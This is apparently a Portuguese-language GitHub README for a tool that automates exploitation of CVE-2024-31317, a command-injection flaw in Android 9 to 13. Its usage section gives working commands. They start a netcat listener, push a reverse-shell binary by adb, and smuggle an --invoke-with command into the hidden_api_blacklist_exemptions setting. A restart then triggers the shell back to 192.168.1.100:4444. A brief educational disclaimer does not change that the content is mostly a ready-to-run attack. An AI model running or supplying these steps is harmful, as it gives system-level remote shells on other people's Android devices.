
Ferramenta de implantação automatizada para CVE-2024-31317, uma vulnerabilidade de injeção de comando no Android 9-13. Inclui payload de shell reverso, script de compilação e análise técnica para pesquisa e educação em segurança.
Este projeto é destinado apenas para fins educacionais e de pesquisa em segurança. Usar esta ferramenta para testes não autorizados é ilegal. O autor não se responsabiliza por qualquer uso indevido ou dano.
O CVE-2024-31317 é uma vulnerabilidade grave de segurança que afeta dispositivos Android 9 a 13, permitindo que aplicações com a permissão WRITE_SECURE_SETTINGS obtenham execução em nível de sistema por meio de injeção de comandos.
Este projeto fornece uma análise técnica detalhada da vulnerabilidade, código de prova de conceito e ferramentas de implantação automatizada.
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# Iniciar ouvinte
nc -lvnp 4444
# Transferir e executar
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# Injetar payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# Disparar vulnerabilidade
adb shell stop && adb shell start
Este projeto é destinado apenas para fins educacionais e de pesquisa em segurança. Ao usar esta ferramenta, você concorda em:
Este projeto é licenciado sob a licença MIT - consulte o arquivo LICENSE para detalhes.
fcy10012 - GitHub
Projeto de referência: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ Se este projeto foi útil para você, dê uma estrela!